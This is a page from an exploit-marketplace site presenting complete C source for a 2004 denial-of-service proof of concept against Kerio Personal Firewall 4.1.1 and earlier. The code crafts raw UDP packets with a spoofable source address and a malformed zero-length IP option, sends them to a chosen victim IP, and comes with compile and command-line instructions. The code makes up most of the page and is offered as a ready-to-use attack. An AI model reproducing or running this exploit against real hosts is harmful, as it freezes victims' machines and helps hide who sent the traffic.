0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kerio Personal Firewall <= 4.1.1 Multiple IP Options DoS Exploit
================================================================ Kerio Personal Firewall <= 4.1.1 Multiple IP Options DoS Exploit ================================================================ /* HOD-kerio-firewall-DoS-expl.c: 2004-11-10 * * Copyright (c) 2004 houseofdabus * * Kerio Personal Firewall Multiple IP Options Denial of Service PoC * * Coded by * * * .::[ houseofdabus ]::. * * * * Bug discoveried by eEye: * http://www.eeye.com/html/research/advisories/AD20041109.html * * --------------------------------------------------------------------- * Tested on: * - Kerio Personal Firewall 4.1.1 * * Systems Affected: * - Kerio Personal Firewall 4.1.1 and prior * * --------------------------------------------------------------------- * Description: * The vulnerability allows a remote attacker to reliably render * a system inoperative with one single packet. Physical access is * required in order to bring an affected system out of this * "frozen" state. This specific flaw exists within the component * that performs low level processing of TCP, UDP, and ICMP packets. * * --------------------------------------------------------------------- * Compile: * Win32/VC++ : cl -o HOD-kpf-DoS-expl HOD-kpf-DoS-expl.c * Win32/cygwin: gcc -o HOD-kpf-DoS-expl HOD-kpf-DoS-expl.c -lws2_32.lib * Linux : gcc -o HOD-kpf-DoS-expl HOD-kpf-DoS-expl.c -Wall * * --------------------------------------------------------------------- * Command Line Parameters/Arguments: * * HOD-kerio-firewall-DoS-expl <-fi:str> <-ti:str> [-n:int] * * -fi:IP From (sender) IP address * -ti:IP To (target) IP address * -n:int Number of packets * * --------------------------------------------------------------------- * * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission to * do so. * */ /* #define _WIN32 */ #ifdef _WIN32 #pragma comment(lib,"ws2_32") #pragma pack(1) #define WIN32_LEAN_AND_MEAN #include <winsock2.h> #include <ws2tcpip.h> /* IP_HDRINCL */ #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #endif #include <string.h> #include <stdio.h> #include <stdlib.h> #define MAX_MESSAGE 4068 #define MAX_PACKET 4096 #define DEFAULT_PORT 53 #define DEFAULT_IP "192.168.0.1" #define DEFAULT_COUNT 1 #ifndef _WIN32 # define FAR #endif /* Define the IP header */ typedef struct ip_hdr { unsigned char ip_verlen; /* IP version & length */ unsigned char ip_tos; /* IP type of service */ unsigned short ip_totallength; /* Total length */ unsigned short ip_id; /* Unique identifier */ unsigned short ip_offset; /* Fragment offset field */ unsigned char ip_ttl; /* Time to live */ unsigned char ip_protocol; /* Protocol */ unsigned short ip_checksum; /* IP checksum */ unsigned int ip_srcaddr; /* Source address */ unsigned int ip_destaddr; /* Destination address */ } IP_HDR, *PIP_HDR, FAR* LPIP_HDR; /* Define the UDP header */ typedef struct udp_hdr { unsigned short src_portno; /* Source port number */ unsigned short dst_portno; /* Destination port number */ unsigned short udp_length; /* UDP packet length */ unsigned short udp_checksum; /* UDP checksum (optional) */ } UDP_HDR, *PUDP_HDR; char udpmsg[] = "\x4b\x65\x72\x69\x6f\x20\x50\x65\x72\x73\x6f\x6e\x61\x6c\x20\x46" "\x69\x72\x65\x77\x61\x6c\x6c\x20\x44\x6f\x53\x20\x50\x6f\x43\x20" "\x28\x34\x2e\x31\x2e\x31\x20\x61\x6e\x64\x20\x70\x72\x69\x6f\x72" "\x29\x2e\x20\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29" "\x20\x32\x30\x30\x34\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\x62" "\x75\x73\x2e"; /* globals */ unsigned long dwToIP, /* IP to send to */ dwFromIP; /* IP to send from (spoof) */ unsigned short iToPort, /* Port to send to */ iFromPort; /* Port to send from (spoof) */ unsigned long dwCount; /* Number of times to send */ char strMessage[MAX_MESSAGE]; /* Message to send */ void usage(char *progname) { printf("Usage:\n\n"); printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-n:int]\n\n", progname); printf(" -fi:IP From (sender) IP address\n"); printf(" -ti:IP To (target) IP address\n"); printf(" -n:int Number of packets\n"); exit(1); } void ValidateArgs(int argc, char **argv) { int i; iToPort = 53; iFromPort = DEFAULT_PORT; dwToIP = inet_addr(DEFAULT_IP); dwFromIP = inet_addr(DEFAULT_IP); dwCount = DEFAULT_COUNT; memcpy(strMessage, udpmsg, sizeof(udpmsg)-1); for(i = 1; i < argc; i++) { if ((argv[i][0] == '-') || (argv[i][0] == '/')) { switch (tolower(argv[i][1])) { case 'f': switch (tolower(argv[i][2])) { case 'i': if (strlen(argv[i]) > 4) dwFromIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 't': switch (tolower(argv[i][2])) { case 'i': if (strlen(argv[i]) > 4) dwToIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 'n': if (strlen(argv[i]) > 3) dwCount = atol(&argv[i][3]); break; default: usage(argv[0]); break; } } } return; } /* This function calculates the 16-bit one's complement sum */ /* for the supplied buffer */ unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(unsigned short); } if (size) { cksum += *(unsigned char *)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (unsigned short)(~cksum); } int main(int argc, char **argv) { #ifdef _WIN32 WSADATA wsd; #endif int s; #ifdef _WIN32 BOOL bOpt; #else int bOpt; #endif struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; int ret; unsigned long i; unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; char buf[MAX_PACKET], *ptr = NULL; #ifdef _WIN32 IN_ADDR addr; #else struct sockaddr_in addr; #endif printf("\nKerio Personal Firewall Multiple IP Options Denial of Service PoC\n\n"); printf("\tCopyright (c) 2004 .::[ houseofdabus ]::.\n\n"); if (argc < 3) usage(argv[0]); /* Parse command line arguments and print them out */ ValidateArgs(argc, argv); #ifdef _WIN32 addr.S_un.S_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort); addr.S_un.S_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort); printf("[*] Count: %d\n", dwCount); #else addr.sin_addr.s_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort); addr.sin_addr.s_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort); printf("[*] Count: %d\n", dwCount); #endif #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) { printf("[-] WSAStartup() failed: %d\n", GetLastError()); return -1; } #endif /* Creating a raw socket */ s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); #ifdef _WIN32 if (s == INVALID_SOCKET) { printf("[-] WSASocket() failed: %d\n", WSAGetLastError()); return -1; } #endif /* Enable the IP header include option */ #ifdef _WIN32 bOpt = TRUE; #else bOpt = 1; #endif ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); #ifdef _WIN32 if (ret == SOCKET_ERROR) { printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError()); return -1; } #endif /* Initalize the IP header */ iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(udpmsg)-1 + 4; iIPVersion = 4; iIPSize = sizeof(ipHdr) / sizeof(unsigned long); iIPSize += 1; /* IP options */ ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; /* IP type of service */ ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */ ipHdr.ip_id = 0; /* Unique identifier: set to 0 */ ipHdr.ip_offset = 0; /* Fragment offset field */ ipHdr.ip_ttl = 128; /* Time to live */ ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */ ipHdr.ip_checksum = 0 ; /* IP checksum */ ipHdr.ip_srcaddr = dwFromIP; /* Source address */ ipHdr.ip_destaddr = dwToIP; /* Destination address */ /* Initalize the UDP header */ iUdpSize = sizeof(udpHdr) + sizeof(udpmsg)-1; udpHdr.src_portno = htons(iFromPort); udpHdr.dst_portno = htons(iToPort); udpHdr.udp_length = htons(iUdpSize); udpHdr.udp_checksum = 0 ; iUdpChecksumSize = 0; ptr = buf; memset(buf, 0, MAX_PACKET); memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr)); ptr += sizeof(ipHdr.ip_srcaddr); iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr); memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr)); ptr += sizeof(ipHdr.ip_destaddr); iUdpChecksumSize += sizeof(ipHdr.ip_destaddr); ptr++; iUdpChecksumSize += 1; memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol)); ptr += sizeof(ipHdr.ip_protocol); iUdpChecksumSize += sizeof(ipHdr.ip_protocol); memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length)); ptr += sizeof(udpHdr.udp_length); iUdpChecksumSize += sizeof(udpHdr.udp_length); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); iUdpChecksumSize += sizeof(udpHdr); for(i = 0; i < sizeof(udpmsg)-1; i++, ptr++) *ptr = strMessage[i]; iUdpChecksumSize += sizeof(udpmsg)-1; cksum = checksum((unsigned short *)buf, iUdpChecksumSize); udpHdr.udp_checksum = cksum; memset(buf, 0, MAX_PACKET); ptr = buf; memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr); /* IP option (length = 0x00) */ memcpy(ptr, "\x88\x00\x12\x34", 4); ptr += 4; memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); memcpy(ptr, strMessage, sizeof(udpmsg)-1); remote.sin_family = AF_INET; remote.sin_port = htons(iToPort); remote.sin_addr.s_addr = dwToIP; for(i = 0; i < dwCount; i++) { #ifdef _WIN32 ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote)); if (ret == SOCKET_ERROR) { printf("[-] sendto() failed: %d\n", WSAGetLastError()); break; } else #else ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote, sizeof(remote)); #endif printf("[+] sent %d bytes\n", ret); } #ifdef _WIN32 closesocket(s); WSACleanup(); #endif return 0; } # 0day.today [2024-12-25] #